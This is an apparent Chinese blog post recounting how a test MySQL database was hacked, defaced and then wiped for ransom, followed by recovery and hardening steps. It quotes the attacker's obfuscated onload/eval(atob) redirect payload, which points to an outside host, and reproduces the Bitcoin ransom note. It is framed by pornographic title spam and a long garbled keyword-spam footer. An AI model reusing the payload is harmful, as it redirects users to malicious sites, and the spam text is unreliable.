精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

運維|MySQL 數據庫被黑,心力交瘁

數據庫
前一陣有一個測試用的 MySQL 數據庫被黑了,刪庫勒索的那種,這里記錄一下事情經過,給自己也敲個警鐘。

前一陣有一個測試用的 MySQL 數據庫被黑了,刪庫勒索的那種,這里記錄一下事情經過,給自己也敲個警鐘。

發現端倪

有一天,我在自測功能的時候,發現 APP 里展示的每條詳情信息里都有一段亂碼,只是有點奇怪,沒有特別在意,后來調試網頁的時候看到控制臺有個報錯,就順手看了一眼,發現詳情網頁里有這樣的東西:

找我的前端小伙伴討論了下,最后本地調試了一番,發現是數據庫里有個字段齊刷刷地被改成這個了:

<body/onload=eval(atob("d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vaHpyMGRtMjhtMTdjLmNvbS9lYm1zczBqcTc/a2V5PWM5MGEzMzYzMDEzYzVmY2FhZjhiZjVhOWE0ZTQwODZhIik="))>

atob 里面這一串是被 Base64 編碼的 window.location.replace("https://xxx.com/xxx"),所以這段代碼如果在網頁里被正常加載,網頁會被自動重定向到一個邪惡的網址:

是不是挺可怕?瀏覽網頁的人如果警惕性不高,可能就中招了。這時我明白過來,我的測試環境這是被當成肉雞了……

不過當時還是大意了,因為暫時沒有想通它是怎樣攻擊和篡改,以為就是從頁面注入的,就在邏輯里加了一些防護邏輯,把這個字段值都改回去然后就繼續干活了。

庫沒人懵

到第二天,正歡樂地測著功能呢,突然打開啥頁面都報數據庫異常了,到庫里一看,好家伙,所有表都沒了,只剩一張 readme,里面寫著:

以下數據庫已被刪除:xxx。我們有完整的備份。要恢復它,您必須向我們的比特幣地址bc1q8erv6l4xrdqsfpwp92gm0mccur49pqn8l8epfg支付0.016比特幣(BTC)。如果您需要證明,請通過以下電子郵件與我們聯系。song4372@proton.me 。任何與付款無關的郵件都將被忽略!

事情沒我想象的簡單!能把庫里的表都刪了,數據庫和服務器的權限怕是都被拿到了。

仔細回想了前一段時間里發生的事情,推測過程可能是這樣的:

  • 最開始,有一天接收到阿里云的告警,提示 AK 泄漏,查看事件日志發現利用 AK 創建了一個 RAM 子賬號,并賦予了高權限,當時我禁用了涉及的 AK,刪除了被創建的子賬號,但服務器應該已經被滲透了;
  • 然后就是數據庫字段被篡改,估計是一方面把服務器資源作為肉雞繼續擴散攻擊其它人,另一方面作為誘餌,監控處理動作;
  • 最后就是刪庫勒索了。

奪回權限

當務之急,是奪回權限,恢復數據。整個服務器和數據庫的權限應該都不安全了,所以我先采取了以下措施:

  • 檢查服務器安全組規則,發現被加入了允許公網訪問 3306 和所有端口的記錄,將其刪除;
  • 檢查服務器上的用戶,發現多了一個用戶 guest,uid 0,將其禁用;
  • 檢查進程,發現有用 guest 用戶啟動的 bash 進程和 mysql root 用戶進程,將其 kill 掉;
  • 修改服務器所有用戶密碼,檢查用戶權限;
  • 修改數據庫端口、重置所有用戶和密碼,只賦予用戶必要權限;
  • 更新服務器,修復已知安全漏洞;

用到的主要指令:

# 檢查 Linux 服務器上的用戶
cat /etc/passwd

# 修改用戶密碼
passwd <username>

# 檢查進程
ps -ef 

# 殺掉進程
kill -9 <pid>

# 修改數據庫端口
vim /etc/my.cnf

# mysql 刪除用戶,在 mysql 命令行執行
drop user '<user_name>'@'<scope>';
# mysql 創建用戶,賦予權限,在 mysql 命令行執行
create user '<user_name>'@'<scope>' IDENTIFIED BY '<password>';
grant select,insert,update,delete on '<database_name>'.* to '<user_name>'@'<scope>';

修復數據

接下來就是修復數據了。

這個測試用的 MySQL 實例開啟了 binlog,可惜被攻擊者清除了,所以只能從備份恢復了。數據用定時任務 + mysqldump,每天備份一次,找到合適的備份,恢復數據。

ps: 幸虧有備份,不然真是欲哭無淚了。

# 解壓備份文件
gunzip -c xxx.sql.gz > xxx.sql

# 恢復數據,在 mysql 命令行執行
use <database_name>;
souce /path/to/xxx.sql;

小結

以上的步驟的操作過程,遠沒有看起來那么簡單,實際耗費了我挺長時間。

這次事件讓我深刻地意識到,安全問題不容忽視,不管是服務器還是數據庫,都要做好安全措施,不要給攻擊者可乘之機。不然真到了被攻擊,而又自行恢復無望的時候,那就叫天天不應,叫地地不靈了。退一萬步說,即使有備份,也會耗費大量的時間和精力,影響正常的工作和生活。

安全任重道遠,后續先做好以下方面:

  • 訪問控制,只賦予必要權限;
  • 服務器鏡像、數據庫定期備份;
  • 定期漏洞掃描與修復;
  • 敏感數據加密;
  • 操作審計;

最后,警鐘常鳴!

責任編輯:趙寧寧 來源: 悶騷的程序員
相關推薦

2015-10-10 09:19:29

程序員編程工作熱情

2020-12-14 10:22:50

開發開源安全

2015-10-10 08:52:13

程序員疲勞

2018-12-14 11:04:56

數據庫運維智能

2018-09-18 09:36:52

運維數據庫智能

2019-04-25 15:35:37

MySQL數據庫運維Linux

2013-08-07 10:23:58

MySQL運維數據庫運維

2015-06-02 16:16:17

mysql優化mysql讀寫分離mysql主從復制

2019-01-15 18:03:54

數據庫運維 技術

2023-01-03 08:55:38

PG數據庫運維

2022-12-07 21:28:43

數據庫運維云原生

2025-09-15 06:40:00

Warpgate開源運維

2018-08-27 10:59:07

京東數據庫智能運維

2023-06-06 07:31:33

數據庫運維管理平臺

2024-04-22 08:15:50

數據庫運維工具

2018-05-02 14:30:33

數據庫運維優化故障

2018-05-08 09:49:15

數據庫運維優化

2014-02-19 13:30:05

運維安全數據庫
點贊
收藏

51CTO技術棧公眾號

欧洲在线视频| 免费看黄色一级视频| 91影院成人| 欧美一卡2卡3卡4卡| 国产婷婷一区二区三区| 国产视频三级在线观看播放| 激情综合色播激情啊| 欧美激情亚洲综合一区| 精品国产av无码| 日本在线视频一区二区三区| 欧美日韩一区二区在线 | 手机av在线网站| 色yeye免费人成网站在线观看| 99精品久久久久久| 亚洲bt天天射| 波多野结衣视频观看| 欧美一区二区三区久久精品茉莉花| 亚洲国产小视频| 日本在线观看视频一区| av综合电影网站| 亚洲美女区一区| 色一情一乱一伦一区二区三区丨| 亚洲va天堂va欧美ⅴa在线| 久久在线91| 欧美激情一级二级| 性生交大片免费全黄| 九九视频精品全部免费播放| 日韩免费高清视频| 色婷婷综合网站| 久久电影tv| 亚洲成a人片在线观看中文| 成人在线观看www| 激情在线视频| 91色porny在线视频| 亚洲在线一区二区| 一区二区三区免费在线视频| 久久免费高清| 日本高清不卡在线| 亚欧视频在线观看| 伊人影院久久| 欧美日本精品在线| 国产波霸爆乳一区二区| 香蕉国产精品| 不卡中文字幕av| www.av免费| 我不卡伦不卡影院| 综合欧美国产视频二区| 调教驯服丰满美艳麻麻在线视频 | 亚洲国产精品123| 黄色网址在线播放| 国产日产欧美一区| 日韩高清专区| www.在线视频.com| 中文久久乱码一区二区| 香蕉久久免费影视| 97电影在线看视频| 综合在线观看色| 欧美大片免费播放| 性网站在线观看| 亚洲黄色av一区| 男人天堂av片| 日韩欧美精品一区二区三区| 午夜精品福利在线| 日韩欧美国产免费| 草莓视频成人appios| 欧美日韩在线播放三区四区| 中文字幕天天干| 91国产精品| 日韩视频免费观看高清完整版 | 成人精品影院| 久久精品国产一区| 麻豆国产尤物av尤物在线观看| 在线电影一区二区| 欧美激情一级欧美精品| 国产成人在线免费观看视频| 99精品国产一区二区青青牛奶| 1769国产精品| 中文字幕日产av| 国产毛片一区二区| 国模精品一区二区三区| 伦理片一区二区三区| 国产精品久久久久天堂| 欧美日韩dvd| 小视频免费在线观看| 在线观看一区日韩| 国产精品19p| 日韩有码中文字幕在线| 中文字幕视频一区二区在线有码 | 成人精品在线视频| 六月丁香综合网| 国产三级一区二区| 久久香蕉视频网站| 日韩高清不卡| 欧美mv日韩mv亚洲| 91l九色lporny| 午夜欧美理论片| 国产成人极品视频| av无码精品一区二区三区宅噜噜| 97精品久久久久中文字幕| 色一情一乱一伦一区二区三区 | 日韩电影二区| 国内精品久久久久伊人av| 中文字幕一区二区三区四区欧美| 国产一区二区精品久久99| 美女一区视频| 性网站在线观看| 欧美亚男人的天堂| 性色av蜜臀av浪潮av老女人| 日韩国产综合| 78m国产成人精品视频| 国产精品伊人久久 | 欧美日韩一区二区三区免费| 黄色av免费在线| 91久久一区二区| 中文字幕天堂网| 五月天久久网站| 日韩av免费网站| 日本精品999| 亚洲精品中文在线影院| 青青青在线视频免费观看| 欧美深夜视频| 欧美国产日韩xxxxx| 中文字幕永久免费视频| 久久久不卡网国产精品二区 | 都市激情久久综合| 欧美一区二区在线播放| 亚洲色图 激情小说| 亚洲在线电影| 久草一区二区| 91九色美女在线视频| 欧美一区二区免费观在线| 国产精品久久久视频| 久久精品系列| 久久久久成人精品免费播放动漫| 欧美亚洲系列| 日韩精品一区二区三区中文精品| 欧美色视频一区二区三区在线观看| 久久三级视频| 欧美精品欧美精品| 亚洲精品mv| 亚洲欧美一区二区精品久久久| 亚洲国产综合久久| 成人性生交大合| 欧美日韩福利在线| 国产精品2023| 韩日欧美一区二区| 国产又爽又黄网站亚洲视频123| 一区二区三区不卡在线观看| 久久久久亚洲av无码麻豆| 婷婷综合社区| 91精品视频在线免费观看| 午夜免费视频在线国产| 欧美日韩免费一区二区三区| 国产又色又爽又高潮免费| 久久超碰97中文字幕| 尤物国产精品| 免费看日产一区二区三区| 欧美人与性动交a欧美精品| 狠狠综合久久av一区二区| 亚洲午夜av在线| 男男做爰猛烈叫床爽爽小说| 亚洲视频二区| 日韩福利一区二区三区| 亚洲高清影院| 欧美大成色www永久网站婷| www.黄色国产| 欧美日韩性生活视频| 日韩av在线看免费观看| 日韩av电影天堂| 亚洲免费av网| 成人午夜大片| 欧洲午夜精品久久久| av在线免费播放网站| 欧美一区二区在线免费观看| 妺妺窝人体色www在线下载| av不卡在线观看| 日本女优爱爱视频| 91综合久久| 国产一区精品视频| 国产成人免费精品| 欧美国产日韩在线| 精品电影在线| 日韩一区二区三区在线| 好吊妞视频一区二区三区| 国产精品久久看| 国产一精品一aⅴ一免费| 欧美亚洲三级| 日韩国产精品毛片| 伊人成综合网伊人222| 91久久国产精品91久久性色| 91破解版在线观看| 最新91在线视频| 天天操天天干天天| 欧美日本一区二区| 久久国产精品系列| 国产精品传媒在线| 真人bbbbbbbbb毛片| 精品一区二区三区日韩| 无码专区aaaaaa免费视频| 日韩精品dvd| 国产一区二区无遮挡| 亚州欧美在线| 国产精品成人免费电影| 欧美男男video| 日韩中文字幕在线视频| 亚洲人成色777777老人头| 91精品国产入口| 亚洲中文一区二区| 亚洲一区二区免费视频| 日本人亚洲人jjzzjjz| 成人精品一区二区三区四区| 天天干天天综合| 国产精品腿扒开做爽爽爽挤奶网站| 国产盗摄视频在线观看| 国产99精品| 久久99国产精品| 北条麻妃一区二区三区在线| 国产在线视频不卡| av高清一区| 欧美最顶级丰满的aⅴ艳星| 欧美色图天堂| 久久99国产精品久久久久久久久| 成全电影播放在线观看国语| 亚洲成人在线视频播放| www.日日夜夜| 91精品国模一区二区三区| 中文字幕黄色av| 欧美日韩亚洲一区二| 日韩av女优在线观看| 亚洲精品乱码久久久久久黑人| 国产小视频你懂的| 国产欧美日韩综合精品一区二区| 草草地址线路①屁屁影院成人| 福利一区二区在线| 一级黄色高清视频| 久久91精品国产91久久小草| 国产一区二区在线免费播放| 久久五月激情| 999精品网站| 首页欧美精品中文字幕| 黄www在线观看| 在线综合亚洲| 热99这里只有精品| 亚洲精品麻豆| 国产成人无码精品久久久性色| 在线播放亚洲| 国产极品尤物在线| 亚洲在线电影| 女人另类性混交zo| 日本成人在线不卡视频| 日日摸天天爽天天爽视频| 久久久蜜桃一区二区人| 欧美aⅴ在线观看| 日日摸夜夜添夜夜添精品视频| 日本成人在线免费视频| 日本欧美一区二区| 在线不卡一区二区三区| 精品在线你懂的| 波多野结衣中文字幕在线播放| 国产精品99久久久久久似苏梦涵 | 4388成人网| 毛片无码国产| 国产一区视频在线| 国产一区二区三区精品在线观看| 99久久精品无码一区二区毛片| 136导航精品福利| 麻豆视频成人| 99精品综合| 97超碰国产精品| 麻豆成人精品| 一路向西2在线观看| 国产精品一区二区x88av| 少妇一级淫片免费放播放| 91女厕偷拍女厕偷拍高清| 日本人亚洲人jjzzjjz| 亚洲免费视频中文字幕| 亚洲精品77777| 在线免费亚洲电影| 国产毛片在线视频| 亚洲国产精品久久91精品| 黄视频在线播放| 欧美xxxx综合视频| 亚洲天堂av在线| 国产欧美久久久久久| baoyu135国产精品免费| 日韩福利视频| 极品av少妇一区二区| 国产精品69页| 国产成人精品一区二| 人妻体内射精一区二区| 亚洲少妇30p| 免费黄色网址在线| 日韩一区二区电影在线| 精品无人乱码| 欧美激情欧美激情| 99久久久国产精品免费调教网站| 69堂成人精品视频免费| 九九精品在线| 免费在线黄网站| 免费欧美在线视频| av无码一区二区三区| 中文字幕一区日韩精品欧美| 国产黄色片免费看| 91麻豆精品国产91久久久更新时间| 日韩大胆视频| 久久久久久久久亚洲| 97欧美成人| 欧美精品中文字幕一区二区| 亚洲国产一区二区三区在线播放 | 黄色一级片网址| 六月婷婷一区| 亚洲精品激情视频| 亚洲日本在线天堂| 探花国产精品一区二区| 亚洲精品videossex少妇| 超碰超碰在线| 国产精品中文字幕久久久| 天堂综合网久久| 国产在线视频在线| 久久国产精品色| 免费黄在线观看| 欧美视频中文在线看| 欧美一区二区黄片| 欧美风情在线观看| 国产精品一区二区美女视频免费看 | 国产日韩成人精品| 丁香六月婷婷综合| 亚洲国产天堂网精品网站| 日韩专区av| 亚洲www在线观看| 亚洲91精品| 深爱五月综合网| 亚洲欧美激情小说另类| 一区二区三区精彩视频| 中文字幕亚洲图片| 四虎影视4hu4虎成人| 欧美日韩在线一区二区三区| 日韩一级精品| 51调教丨国产调教视频| 五月激情丁香一区二区三区| 无码国精品一区二区免费蜜桃| 欧美激情xxxxx| 97se亚洲国产一区二区三区| 国产欧美123| 成人黄色国产精品网站大全在线免费观看| 日韩a级片在线观看 | 天天做天天干天天操| 国产精品成人网| 99久久久无码国产精品免费| 美女福利视频一区| 88久久精品| 亚欧无线一线二线三线区别| ww久久中文字幕| 高清乱码免费看污| 在线播放亚洲激情| 亚洲美女色播| 蜜桃网站在线观看| 成人深夜在线观看| √资源天堂中文在线| 在线视频亚洲欧美| 99精品国产九九国产精品| 神马午夜伦理影院| 不卡一卡二卡三乱码免费网站| 国产成人无码精品亚洲 | yellow91字幕网在线| 99精彩视频| 亚洲免费婷婷| 农村老熟妇乱子伦视频| 91麻豆精品久久久久蜜臀| 成年网站在线视频网站| 免费日韩av电影| 麻豆国产欧美一区二区三区| 欧美黑人性猛交xxx| 亚洲精品一区二区三区香蕉| 欧美成人黑人| 日本三日本三级少妇三级66| 99国产精品国产精品毛片| 久久国产乱子伦精品| 久久综合电影一区| 欧美freesex8一10精品| 天堂av在线网站| 一区二区免费在线播放| 人操人视频在线观看| 国产欧美日韩综合精品| 亚洲黄色成人| av在线播放中文字幕| 日韩视频在线你懂得| 性欧美gay| 国产精品国三级国产av| 久久久青草青青国产亚洲免观| 国产精品久久久久久久久毛片| 91精品国产91久久久久福利| 成人午夜国产| 手机在线成人av| 91精品久久久久久久99蜜桃| 美女100%一区| 日韩免费在线观看av| 国产精品女主播在线观看| 色婷婷激情五月| 亚洲va男人天堂|